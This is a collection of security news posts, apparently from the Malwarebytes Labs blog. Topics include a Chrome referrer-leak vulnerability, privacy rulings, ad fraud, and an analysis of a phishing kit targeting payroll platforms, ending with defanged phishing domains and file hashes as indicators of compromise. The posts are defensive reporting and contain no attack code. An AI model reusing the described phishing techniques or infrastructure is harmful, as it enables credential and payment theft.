Malware Bytes Security
Update your Chrome to fix serious actively exploited vulnerability
Google released an emergency update for the Chrome browser to patch an actively exploited vulnerability that could have serious ramifications.
The update brings the Stable channel to versions 136.0.7103.113/.114 for Windows and Mac and 136.0.7103.113 for Linux.
The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.
To manually get the update, click Settings > About Chrome. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is restart the browser in order for the update to complete, and for you to be safe from those vulnerabilities.
This update is crucial since it addresses an actively exploited vulnerability which could allow an attacker to steal information you share with other websites. Google says it’s aware that knowledge of CVE-2025-4664 exists in the wild. But while Google didn’t acknowledge that the vulnerability is actually being actively exploited, the Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities catalog—a strong indication the vulnerability is being used out there.
Technical detailsThe vulnerability tracked as CVE-2025–4664, lies in the Chrome Loader component, which handles resource requests. When you visit a website, your browser often needs to load additional pieces of that site, such as images, scripts, or stylesheets, which may come from various sources. The Loader manages these requests to fetch and display those resources properly.
While it does that, it should enforce security policies that prevent one website from accessing data belonging to another website, a principle known as the “same-origin policy.”
The vulnerability lies in the fact that those security policies were not applied properly to Link headers. This allowed an attacker to set a referrer-policy in the Link header which tells Chrome to include full URLs, including sensitive query parameters.
This is undesirable since query parameters in full URLs often contain sensitive information such as OAuth tokens (used for authentication), session identifiers, and other private data.
Imagine you visit a website related to sensitive or financial information, and the URL includes a secret code in the address bar that proves it’s really you. Normally, when your browser loads images or other content from different websites, it keeps that secret code private. But because of this Chrome Loader flaw, a successful attacker can trick your browser into sending that secret code to a malicious website just by embedding an image or other resource there.
The attacker could, for example, embed a hidden image hosted at their own server, and harvest the full URLs. This means they can steal your private information without you realizing it, potentially letting them take over your account or other online services.
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
A week in security (May 12 – May 18)
Last week on Malwarebytes Labs:
- Data broker protection rule quietly withdrawn by CFPB
- Meta sent cease and desist letter over AI training
- Google to pay $1.38 billion over privacy violations
- Android users bombarded with unskippable ads
Last week on ThreatDown:
- ThreatDown introduces Firewall Management
- Introducing Browser Phishing Protection: enhanced web security for your organization
Stay safe!
Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.
Data broker protection rule quietly withdrawn by CFPB
The Consumer Financial Protection Bureau (CFPB) has decided to withdraw a 2024 rule to limit the sale of Americans’ personal information by data brokers.
In a Federal Register notice published yesterday, the CFPB said it “has determined that legislative rulemaking is not necessary or appropriate at this time to address the subject matter”.
The data brokerage industry generates an estimated $300 billion in annual revenue. Data brokers actively collect and sell your Personally Identifiable Information (PII), including financial details, personal behavior, and interests, for profit. They often do this without seeking your consent or without making it clear that you have given consent.
The CFPB proposed the rule in December 2024 to curb data brokers from selling Americans’ sensitive personal and financial information. By restricting the sale of personal identifiers such as Social Security Numbers (SSNs) and phone numbers, the rule aimed to ensure that companies share financial data, like income, only for legitimate purposes, such as facilitating a mortgage approval, rather than selling it on to scammers who target people in financial distress.
The proposal sought to make data brokers comply with federal law and address serious threats posed by current industry practices. It targeted not only national security, surveillance, and criminal exploitation risks, but also aimed to limit doxxing and protect the personal safety of law enforcement personnel and domestic violence survivors.
The CFPB intended to treat data brokers like credit bureaus and background check companies, requiring them to comply with the Fair Credit Reporting Act (FCRA) regardless of how they use financial information. The proposal would also have required data brokers to obtain much more explicit and separately authorized consumer consent.
By setting it up this way it wouldn’t have interfered with the existing pathways created for and by the FCRA while offering more consumer protection.
However, acting CFPB Director Russell Vought said the agency had determined the rule was not for now, pointing to “updates to Bureau policies.”
Watchdog groups have a different view on the matter though. Matt Schwartz, a policy analyst at Consumer Reports, stated it would leave consumers vulnerable:
“Data brokers collect a treasure trove of sensitive information about virtually every American and sell that information widely, including to scammers looking to rip off consumers.”
If data brokers would be required to comply with the FCRA:
- They would have to ensure the accuracy and privacy of the data they collect and share.
- Consumers must be provided with mechanisms to dispute and correct inaccurate information.
- Consumers should be notified when their data is used for decisions about credit, insurance, or employment.
- They could face enforcement actions and penalties for non-compliance, as the Federal Trade Commission (FTC) and CFPB have done in the past.
We don’t just report on data privacy—we help you remove your personal information
Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.
Meta sent cease and desist letter over AI training
EU privacy advocacy group NOYB has clapped back at Meta over its plans to start training its AI model on European users’ data. In a cease and desist letter to the social networking giant’s Irish operation signed by founder Max Schrems, the non-profit demanded that it justify its actions or risk legal action.
In April, Meta told users that it was going to start training its generative AI models on their data.
Schrems uses several arguments against Meta in the NOYB complaint:
1. Meta’s ‘legitimate interests’ are illegitimate
NOYB continues to question Meta’s use of opt-out mechanisms rather than excluding all EU users from the process and requiring them to opt in to the scheme. “Meta may face massive legal risks – just because it relies on an “opt-out” instead of an “opt-in” system for AI training,” NOYB said on its site.
Companies who want to process personal data without explicit consent must demonstrate a legitimate interest to do so under GDPR. Meta hasn’t published information about how it justifies those interests, says Schrems. He has trouble seeing how training a general-purpose AI model could be deemed a legitimate interest because it violates a key GDPR principle; limiting data process to specific goals.
NOYB doesn’t believe that Meta can enforce GDPR rights for personal data like the right to be forgotten once an AI system is trained on it, especially if that system is an open-source one like Meta’s Llama AI model.
“How should it have a ‘legitimate interest’ to suck up all data for AI training?” Schrems said. “While the ‘legitimate interest’ assessment is always a multi-factor test, all factors seem to point in the wrong direction for Meta. Meta simply says that its interest in making money is more important than the rights of its users.”
2. What you don’t know can hurt you
Schrems warns that people who don’t have a Facebook account but just happen to be mentioned or caught in a picture on a user’s account will be at risk under Meta’s AI training plans. They might not even be aware that their information has been used to train AI, and therefore couldn’t object, he argues.
3. Differentiation is difficult
NOYB also worries that the social media giant couldn’t realistically separate people whose data is linked on the system. For example, what happens if two users are in the same picture, but one has opted out of AI training and one hasn’t? Or they’re in different geographies and one is protected under GDPR and one isn’t?
Trying to separate data gets even stickier when trying to separate ‘special category’ data, which GDPR treats as especially sensitive. This includes things like religious beliefs or sexual orientation.
“Based on previous legal submissions by Meta, we therefore have serious doubts that Meta can indeed technically implement a clean and proper differentiation between users that performed an opt-out and users that did not,” Schrems says.
Other arguments
People who have been entering their data into Facebook for the last two decades could not have been expected to know that Facebook would use their data to train AI now, the letter said. That data is private because it tries hard to protect it from web scrapers, and limits who can see it.
In any case, other EU laws would make it the proposed AI training illegal, NOYB warns. It points to the Digital Markets Act, which stops companies cross-referencing personal data between services without consent.
Meta, which says that it won’t train its AI on private user messages, had originally delayed the process altogether after pushback from the Irish Data Privacy commissioner. Last month the company said that had “engaged constructively” with the regulator. There has been no further news from the Irish DPC on the issue aside from a statement thanking the European Data Protection Board for an opinion on the matter handed down in December. That opinion left the specifics of AI training policy up to national regulators.
“We also understand that the actions planned by Meta were neither approved by the Irish DPC nor other Concerned Supervisory Authorities (CSAs) in the EU/EEA. We therefore have to assume that Meta is openly disregarding previous guidance by the relevant Supervisory Authorities (SAs),” Schrems’ letter said.
NOYB has asked Meta to justify itself or sign a cease and desist order by May 21. Otherwise, it threatens legal action by May 27, which is the date that Meta is due to start its training. If it brings an action under the EU’s new Collective Redress Scheme, it could obtain an injunction from different jurisdictions outside Ireland to shut down the training process and delete the data. A class action suit might also be possible, Schrems added.
In a statement to Reuters, Meta called NOYB “wrong on the facts and the law”, saying that gives adequate opt-out options for users.
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
Google to pay $1.38 billion over privacy violations
The state of Texas reached a mammoth financial agreement with Google last week, securing $1.375 billion in payments to settle two three year-old lawsuits.
The Office of Texas Attorney General Ken Paxton originally filed the first lawsuit against Google in January 2022, complaining that the tech giant collected users’ geolocation data. It alleged that Google has continued to track users’ locations even after they thought they had disabled the feature, and then used the data to serve them advertisements.
Then in May 2022, the state updated that lawsuit to include another allegation—that the company wasn’t being fully up front about the data it collected from users in private browsing mode, also known as Incognito Mode.
Google warned users in its Incognito Mode splash page that that their ISPs, employers or schools, and websites they visited in this mode might still collect data about their activity. The suit called this “insufficient to alert Texans to the amount, kind, and richness of data-collection that persists during Incognito mode.” By promising private browsing, Google created an expectation of privacy that it didn’t fulfil, it alleged.
In October that year, Texas launched another suit that accused Google of collecting biometric information including voice prints and records of facial geometry, using services like Google Photos and the Google Assistant product along with its Nest Hub Max product.
A collection of 40 states had pursued Google over the location tracking issue and had secured a $391.5m payout in 2022, but others had gone it alone. Arizona settled for $85m. Paxton played his own game of Texas Hold’em and won. In a press release on Friday he proudly compared his settlement to the multi-state suit, pointing out that it was “almost a billion dollars less than Texas’s recovery”.
This isn’t the first time that Paxton has trounced Google in a legal fight. In 2023 Texas was part of an all-state $700m settlement with the company over anti-competitive practices in its Play store. It also settled for $8m that year over a deceptive advertising claim. Google paid DJs to promote a new Pixel phone model even though it hadn’t been released yet and they had never used it, the state said.
Last August, it also won a four-year legal battle with Google over monopolistic search practices.
In financial terms, this is Paxton’s second-largest victory by a whisker against Big Tech companies. Texas settled for a $1.4bn payout from Facebook and Instagram owner Meta last July, after suing it for capturing biometric data on Texans. The suit specifically targeted the company’s use of facial recognition to power its Tag Suggestions feature, which enabled users to easily identify and tag people in photos.
The allegations of biometric data misuse against both Meta and Google were bought under the Texas Capture or Use of Biometric Data Act, which it introduced in 2009. The geolocation and private browsing accusations were bought under another Texas law, the Deceptive Trade Practices Act. At a federal level, there is still no cohesive consumer data privacy law, despite several efforts to introduce them on the Hill.
Emboldened by earlier victories, Paxton set up a legal swat team to pursue Big Tech last June. The team, which works within his office’s consumer division, will go after companies that play fast and loose with consumer data, Paxton said. He warned:
“As many companies seek more and more ways to exploit data they collect about consumers, I am doubling down to protect privacy rights.”
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
Android users bombarded with unskippable ads
Researchers have discovered a very versatile ad fraud network—known as Kaleidoscope—that bombards users with unskippable ads.
Normally, ad fraud is not a concern for users of infected devices. They might experience some sluggish behavior on their device, but often that’s the extent of it. Ad fraud is a type of scam aimed at companies, causing them to pay for advertisements that nobody actually sees or clicks on. Instead of real people viewing or clicking on ads, fraudsters use automated programs (bots) or other tricks to generate fake views, clicks, or interactions.
As a result, the advertising company pays for ads without receiving any real value in return. Users of infected devices usually don’t notice anything, since the malicious activity takes place in the background. This also helps the malware avoid detection.
However, the newly discovered ad fraud operation, dubbed Kaleidoscope, is different. Kaleidoscope targets Android users through seemingly legitimate apps in the Google Play Store, as well as malicious lookalikes distributed through third-party app stores.
Both versions of the app share the same app ID. Researchers found over 130 apps associated with Kaleidoscope, resulting in approximately 2.5 million fraudulent installs per month.
Advertisers believe they are paying for ads shown in the “legitimate” app, while users who download versions from third-party app stores are bombarded with the same ads—but they can’t skip them. Because both apps use the same app ID, advertisers never know the difference.
Kaleidoscope is very similar to, and appears to be built on, the CaramelAds ad fraud network, which also used duplicate apps and shares similarities in code and underlying infrastructure.
The researchers explain:
“The malicious app delivers intrusive out-of-context ads under the guise of the benign app ID in the form of full-screen interstitial images and videos, triggered even without user interaction.”
How to protect your deviceGoogle Play Protect automatically protects users against apps that engage in malicious behavior. As a result, the researchers didn’t find any malicious Kaleidoscope versions on the Google Play Store.
To keep your devices free from ad fraud related malware:
- Get your apps from the Google Play store whenever you can.
- Be careful about the permissions you allow a new app. Does it really need those permissions for what it’s supposed to do? In this case the “Display over other apps” should raise a red flag.
- Dubious ad sites often request permission to display notifications. Allowing this will increase the number of ads as they push them to the device’s notification bar.
- Use up-to-date and active security software on your Android.
Malwarebytes detects malware from the Kaleidoscope family as Adware.AdLoader.EXTNXN.
We don’t just report on phone security—we provide it
Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.
A week in security (May 4 – May 10)
Last week on Malwarebytes Labs:
- The AI chatbot cop squad is here (Lock and Code S06E09)
- Android fixes 47 vulnerabilities, including one zero-day. Update as soon as you can!
- “Your privacy is a promise we don’t break”: Dating app Raw exposes sensitive user data
- FBI issues warning as scammers target victims of crime
- WhatsApp hack: Meta wins payout over NSO Group spyware
- Passwords in the age of AI: We need to find alternatives
- Tired of Google sponsored ads? So are we! That’s why we’re introducing the option to block them on iOS
- Cyber criminals impersonate payroll, HR and benefits platforms to steal information and funds
- Google Chrome will use AI to block tech support scam websites
Last week on ThreatDown:
Stay safe!
Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.
Google Chrome will use AI to block tech support scam websites
Google has expressed plans to use Artificial Intelligence (AI) to stop tech support scams in Chrome.
With the launch of Chrome version 137, Google plans to use the on-device Gemini Nano large language model (LLM) to recognize and block tech support scams.
Users already have the ability to chose Enhanced Protection under Settings > Privacy and security > Security > Safe Browsing.
Safe Browsing settingsGoogle’s reasoning, and we agree, is that LLMs are fairly good at understanding and classifying the varied, complex nature of websites. Meaning that, since many malicious sites have a very short lifespan, it is more effective to learn and recognize their behavior rather than keep adding a host of domain names to a block-list (something which Google has frustrated with the introduction of Manifest V3, by the way).
Tech support scams typically follow a certain pattern that should be simple to learn:
- They make your browser tab full screen
- Display the number they want you to call all over the place
- Show the visitor fake ongoing scans and alerts
These are just a few of the characteristics I’d teach the LLM. I’m not speaking for Google here. They just mention they’ll be looking at usage of the Keyboard Lock API.
On that, the Keyboard Lock API is a web technology that allows websites to “capture” keyboard input, meaning they can prevent certain key combinations (or all keys) from working as they normally do in your browser or operating system. Originally, this tool was designed for legitimate purposes, like making web games or remote desktop apps more immersive by stopping accidental key presses from interrupting the experience. But tech support scammers exploit the Keyboard Lock API to make it harder for victims to escape their scam pages. This means that when a visitor tries to close the scam page or switch to another program, nothing happens, making them feel trapped on the site. Which also makes them think their system is actually infected.
Google explains why it went for the on-device method, saying it allows them to see the threats at the same moment the users see them and in the same way the users see them.
“We’ve found that the average malicious site exists for less than 10 minutes, so on-device protection allows us to detect and block attacks that haven’t been crawled before.”
How it worksWhen the user lands on a suspicious page, which is decided by the on-device LLM, based on specific triggers like the Keyboard Lock API, Chrome provides the LLM with the contents of the page that the user is on and queries it to extract security signals, such as the intent of the page. This information is then sent to a Safe Browsing server for a final verdict.
If Safe Browsing decides the website is malicious, Chrome will block the content and show the user a big warning screen, called an “interstitial.”
Image courtesy of GoogleBy making the target think their system is infected, tech support scammers try to gain remote access or obtain payment information. Google says:
“Tech Support scams are an increasingly prevalent form of cybercrime, characterized by deceptive tactics aimed at extorting money or gaining unauthorized access to sensitive data.”
Malwarebytes’ Browser Guard data over the last month shows that 30% of the fraudulent websites we blocked through the browser extensions are tech support scams.
30% of the three fraud categories are TSSSo, it’s nice of Google to let Chrome help us take care of some of those, but Chrome is not the only browser. We’re even hearing stories from users that ran into a website telling them their Windows machine was infected while they were using the Safari browser on their iPad.
We don’t just report on phone security—we provide it
Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.
Cyber criminals impersonate payroll, HR and benefits platforms to steal information and funds
The relentless battle against online fraud is a constant evolution, a digital chase where security teams and malicious actors continually adapt. The increasing sophistication of attacks is blurring the lines between legitimate user behavior and impersonation attempts.
The campaign we are exposing today is a reminder that even the most advanced security technologies do not dissuade threat actors. We discovered a new phishing kit targeting payroll and payment platforms that aims to not only steal victims’ credentials but also to commit wire fraud.
Our investigation began with a fraudulent search ad for Deel, a payroll and human resources company. Clicking on the ad sent employees and employers to a phishing website impersonating Deel.
Beside stealing usernames, passwords and circumventing two factor authentication, we identified malicious code capable of performing additional nefarious actions unbeknownst to the victim. Using a fully authenticated web worker, this phishing kit is using a legitimate hosted web service called Pusher with the intent of manipulating sensitive profile data fields related to banking and payment information.
While we were working this case, the FBI issued a public service announcement (PSA250424) warning people that cyber criminals are using search engine advertisements to impersonate legitimate websites and expanded to target payroll, unemployment programs, and health savings accounts with the goal of stealing money through fraudulent wire transactions or redirecting payments.
The Google ad was taken down quickly, and we have informed Deel and MessageBird (Pusher’s parent company) about the misuse of their respective platforms.
Search results ad targets DeelDeel is a US-based payroll and human resources company founded in 2019 Deel whose platform is designed to streamline the complexities of managing a global workforce, offering solutions for payroll, HR, compliance, and more.
We first identified a malicious Google Search ad for Deel in mid April for the keywords ‘deel login‘. The top link is a sponsored search result, appearing just above the organic search result for Deel’s official website.
The URL in the ad (deel[.]za[.]com) uses the .ZA.COM subdomain of .COM targeting South Africa, essentially an alternative to the .CO.ZA extension. That URL is used as a redirect only, allowing the threat actors to use cloaking in order to redirect clicks to decoy websites (white page) or phishing domains they can rotate.
Phishing portal and 2FAThe first phishing domain we saw was login-deel[.]app but at the time we checked it did not resolve. Shortly thereafter, the same Google ad URL pointed to a new domain, accuont-app-deel[.]cc.
The phishing page is a replica of Deel’s login page with one minor difference: the Log in using Google and Continue with QR code options are disabled, only leaving the user name and password fields for authentication.
After entering their credentials, victims are social engineered by the crooks to type a security code that was sent to their email address. While two-factor authentication is a great added security feature, we can see that it can be rendered useless when victims authenticate into the wrong website.
On the surface, this looks just like another phishing site, until you look deeper and discover more intriguing code.
Traffic analysisTo better understand how this phishing kit works, we recorded a network capture showing the web requests sent and received. This allowed us to identify several interesting components that make this phishing campaign unique.
Of particular interest are several JavaScript libraries, namely pusher.min.js, Worker.js and kel.js.
The phishing kit uses anti-debugging techniques to prevent us from stepping through its code. This is a common practice to hide malicious intent and makes analysis more time consuming.
Scripts analysisLooking at the files that the anti-debugger is trying to conceal, we see that only one is human readable, while the other two are heavily obfuscated using obfuscator.io. The pusher.min.js JavaScript file is a legitimate library from Pusher, a hosted web service that uses APIs, developer tools and libraries to manage connections between servers and clients using technologies like WebSockets.
There seems to be two different types of sessions, based on the functions named createBankSession and createCardSession. When attempting to login into the phishing site, we see a session_type value of “bank” which belongs to the former function.
The kel.js and Worker.js files are both used for authenticating the victim into the real Deel website while a web worker communicates with the threat actor’s infrastructure for processing the credentials and to receive the OTP code to get past two-factor authentication.
WebSockets are a persistent communication protocol that allows for full-duplex communication between a user’s browser and a server. This means data can be pushed from the server to the client in real-time without the client having to constantly request it.
Here’s an example of a WebSocket communication where the user provided the wrong login credentials:
The conversation begins with a pusher:connection_established message, confirming a successful connection to the Pusher real-time service and providing a unique socket_id and an activity_timeout of 120 seconds.
Next, a pusher:subscribe message shows the client requesting to listen for events on a specific channel identified by a unique session ID, indicating a desire to receive real-time updates for that session.
The server then acknowledges this request with a pusher_internal:subscription_succeeded message for the same channel, confirming that the client is now successfully subscribed and will receive broadcasts.
Finally, an events message is received on that session channel, carrying data indicating a “wrongLogin” event has occurred and instructing the client-side application to “Show” something, likely an error message to the user in real-time.
Additional targetsThis phishing kit is unique and can be tracked with the following characteristics:
- Obfuscator.io
- Pusher WebSockets
- Worker.js library
- kel.js/otp.js/auth.js/jquery.js library
We identified several other targets, related to payroll, HR, billing, payment solutions and even commerce platform Shopify. The earliest use we could find goes back to July 2024, but it appears to have flown under the radar.
Justworks: Payroll, benefits, HR, and compliance — all in one place.
Marqeta: End to end credit and payment solutions integration into business processes
Shopify: Commerce platform
OmniFlex (Worldpay): online point of sale solution
ConclusionThe FBI’s PSA highlights several key measures businesses can adopt to protect users related to the following:
- Domain spoofing: Brand impersonation is a real problem that companies need to proactively lookout for.
- Notifications: Victims need to be alerted in several different ways in a timely manner.
- Education: Phishing is getting more sophisticated and users need to be aware of how to best protect themselves.
In that same report, the FBI advises consumers to check the URL to make sure the site is authentic before clicking on an advertisement. This is usually a sound practice, but as we have documented it on this blog many times, URLs within ads can be spoofed also.
Ultimately, the discovery of this phishing kit, with its advanced capability to interact with financial data, reinforces a critical message: online security is a shared responsibility. Users must exercise caution and critical thinking in their online interactions while enhancing their security with available tools; platforms must remain committed to detecting and preventing abuse.
Browser extensions such as Malwarebytes Browser Guard will block ads but also the scams or malware sites associated with these schemes.
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
Indicators of CompromiseRedirect
deel[.]za[.]comPhishing domains
login-deel[.]appaccuont-app-deel[.]cc
justvvokrs-login[.]cc
vye-starr[.]net
maqreta[.]com
ctelllo[.]com
angelistt[.]com
account[.]datedeath[.]com
account[.]turnkeycashsite[.]com
admin-shopffy[.]cc
biilll[.]com
app-parker[.]com
shluhify[.]com
login-biil[.]net
founderga[.]com
admin-shoopiffy[.]com
access-shupfify[.]com
virluaterminal[.]net
Worker.js (SHA256)
56755aaba6da17a9f398c3659237d365c52d7d8f0af9ea9ccde82c11d5cf063fkel.js/otp.js/auth.js/jquery.js (SHA256)
72864bd09c09fe95360eda8951c5ea190fbb3d3ff4424837edf55452db9b36fb6fb006ecc8b74e9e90d954fa139606b44098fc3305b68dcdf18c5b71a7b5e80f
908a128f47b7f34417053952020d8bbdacf3aed1a1fcf4981359e6217b7317c9
5dadc559f2fb3cff1588b262deb551f96ff4f4fc05cd3b32f065f535570629c3
0ef66087d8f23caf2c32cc43db010ffe66a1cd5977000077eda3a3ffce5fa65f
95d008f7f6f6f5e3a8e0961480f0f7a213fa7884b824950fe9fb9e40d918a164
3e4e78a3e1c6a336b17d8aed01489ab09425b60a761ff86f46ab08bfcf421eac
a37463862628876cecfc4f55c712f79a150cdc6ae3cf2491a39cc66dadcf81eb
15606c5cd0e536512a574c508bd8a4707aace9e980ab4016ce84acabed0ad3be
81bcf866bd94d723e50ce791cea61b291e1f120f3fc084dc28cbe087b6602573
1665387c632391e26e1606269fb3c4ddbdf30300fa3e84977b5974597c116871
c56e277fd98fc2c28f85566d658e28a19759963c72a0f94f82630d6365e62c4f
Tired of Google sponsored ads? So are we! That’s why we’re introducing the option to block them on iOS
Sponsored ads on Google search don’t just irritate users—they also provide a dangerous opportunity for cybercriminals to spread malware and scams to their unsuspecting victims. What looks like a harmless search result can be a carefully disguised trap.
At Malwarebytes, our researchers have uncovered a variety of threats hiding in plain sight within these sponsored ads, including Mac stealers distributed through Google Ads, scams targeting popular utility software, and tech support traps.
In some cases, scammers use advanced AI tools like DeepSeek AI to create convincing ads and web pages, increasing the risk to unsuspecting users.
That’s why we’re excited to roll out a brand new feature in Malwarebytes for iOS: the ability to block Google sponsored ads directly on Safari.
If you’ve used our iOS app before, you already know it blocks ads on webpages and ad trackers. But with our newest feature, we’re extending protection to cover those annoying and potentially dangerous sponsored ads listed on search results.
Now, with just a simple toggle, you can make those annoying sponsored ads disappear from your Safari browsing experience.
Try it for yourself: Download Malwarebytes for iOS and enjoy this feature—alongside scam text filtering, a privacy VPN, and call protection—with a free seven-day trial.
Existing users should already have this feature option in their app—check it out now!
Don’t have an iOS device? Download our free Browser Guard extension for ad blocking and scam protection while browsing on your desktop.
Passwords in the age of AI: We need to find alternatives
For decades, passwords have been our default method for keeping online accounts safe. But in the age of artificial intelligence, this traditional security method is facing challenges it was never built to withstand.
A team at Cybernews conducted a study of over 19 billion newly exposed passwords which showed we’re looking at a “a widespread epidemic of weak password reuse.” It shows that despite years of trying to educate users about the dangers of using weak, lazy passwords, and re-using them across different sites and services, we have hardly made any progress.
But our opponents have. They can use new tools, faster computers, and because of both these developments, they ended up needing less effort for a greater yield. Because our digital presence in life has grown enormously and with that the number of passwords and the importance of the information they can unlock.
Enter AIArtificial Intelligence (AI)-powered tools are now capable of cracking passwords faster and more efficiently than ever before. What once took days or weeks using brute force can now be accomplished in minutes. Tools like PassGAN (Password Generative Adversarial Network) use deep learning to predict and generate likely passwords based on leaked data sets. Unlike traditional dictionary attacks, AI doesn’t rely solely on existing word lists. AI is able to learn patterns from billions of compromised passwords and create new ones that closely mimic real human behavior.
This represents a huge advantage to the attackers. While a human hacker might guess that someone used their pet’s name followed by the year they were born, an AI can deduce that “Fluffy2023!” is statistically probable based on thousands of other similar combinations. And it can do this millions of times per second.
AI’s password-cracking capabilities are further supercharged by powerful hardware. Graphics processing units (GPUs), which are commonly used in gaming and scientific computing, can now be harnessed to run password-cracking algorithms at scale. Combined with AI, these machines make short work of weak or even moderately complex passwords.
The result is a world where even passwords once considered strong, like for example “Tr33House!” may no longer provide meaningful protection.
Does that make the password obsolete?Tech companies are already betting on a passwordless future. Passkeys, biometrics, and multi-factor authentication (MFA) are gaining traction. Passkeys, in particular, offer a cryptographic alternative that eliminates the need for users to remember or even create passwords at all. But adoption of passkeys is still in the early stages, and many systems still rely on traditional passwords.
Beyond the technical risks, there are serious personal consequences when passwords are stolen. Due to our widespread online presence, once an attacker obtains your login credentials, they can access sensitive documents, reset other account passwords, or impersonate you online. From there, the path to identity theft is short. Criminals can use stolen data to open credit lines, file fraudulent tax returns, or drain your savings. In many cases, victims don’t even know their identity has been stolen until serious financial or legal damage has already occurred.
In the age of AI, the stakes are higher, and the window of vulnerability is shorter. A single reused or weak password might be all it takes to lose control over your digital identity.
The lesson is clear: we can’t rely on passwords alone anymore. AI has changed the game even further, and now it’s up to us to change how we play it. And as far as passwords go, there are some ways to use them as securely as possible where you have no alternative:
- Make passwords as strong as possible and never reuse passwords.
- Use a password manager to help remember all the passwords.
- Where possible, use MFA as an extra layer.
- Pressure important services into adapting passkeys and use them as soon as the occasion arises.
You can use Malwarebytes’ free Digital Footprint scan to see how many passwords of yours have been included in leaks and data breaches.
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
WhatsApp hack: Meta wins payout over NSO Group spyware
Meta has won almost $170m in damages from Israel-based NSO Group, maker of the Pegasus spyware. The ruling comes after a six-year legal case against the company after Meta accused it of misusing its servers to spy on users.
According to the original complaint against NSO Group, filed in October 2019, the spyware vendor used WhatsApp servers to send malware to around 1400 mobile phones. The purpose was to gain access to the messages on those devices, which were typically used by attorneys, journalists, human rights activists, political dissidents, diplomats, and other senior foreign government officials.
NSO Group reverse engineered WhatsApp’s software and developed its own software and servers to send messages to victims via the WhatsApp service that contained malware. That malware installed itself on the victims’ smartphones using a zero-click attack, meaning that the victim didn’t have to take any action such as opening an link or even answering a call for the compromise to happen; it was enough simply for the message to arrive.
A judge ruled in December that NSO Group had repeatedly dodged requests to provide its code for review, and granted Meta partial summary judgment over the vendor. That set up conditions for a trial to determine damages that started in late April.
NSO Group reportedly argued that Facebook lost nothing as part of the attack, arguing that it should pay the minimum amount in damages. However, the jury awarded Meta $444,719 in compensatory damages and $167,254,000 in punitive damages.
NSO Group is no stranger to controversy. The US federal government blacklisted it in 2021 for enabling foreign governments to spy on a range of people in acts of “transnational repression”. The same year, investigative website The Pegasus Project alleged that the company targeted over 180 journalists around the world. The European Data Protection Supervisor recommended an EU ban on the technology in 2022, although this has not yet happened.
The ruling drew praise from Amnesty International, which had filed a court brief as part of the case outlining the human rights implications of the attacks on Meta. The organization commented:
“This decision should serve as a wake-up call to governments to take proactive, concrete steps to regulate the surveillance industry, to enforce safeguards on their surveillance practices, and to comprehensively ban tools that are inherently incompatible with human rights obligations and standards, such as Pegasus,”
One takeaway stands out for our readers: end-to-end encryption is important for privacy, but it is not enough on its own.
As Meta pointed out in its complaint, NSO couldn’t decrypt WhatsApp messages in transit to users because they are encrypted when they’re sent from one device and stay unreadable until they’re decrypted by the receiving device. However, that doesn’t stop someone from reading the messages after they’re decrypted by the receiving device—someone who compromises your smartphone or PC has control over all of the data on it, including those decrypted messages.
For consumers, this means applying more layer of protection in the form of regular updates, security software, and cybersecurity awareness. Never open links, files, or videos from someone you don’t know. Be skeptical even if they’re from someone you do know—we recommend checking with them over a different channel first to ensure it was really them that sent it.
In this case, even that would not have enough, because NSO Group was able to infect phones without the victim even answering the call. Attacks this sophisticated often target people with sensitive roles such as journalists, activists, and government workers. Google has an advanced protection program for people like this, while Apple launched lockdown mode for high-risk users. Facebook has its own initiative.
We don’t just report on phone security—we provide it
Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.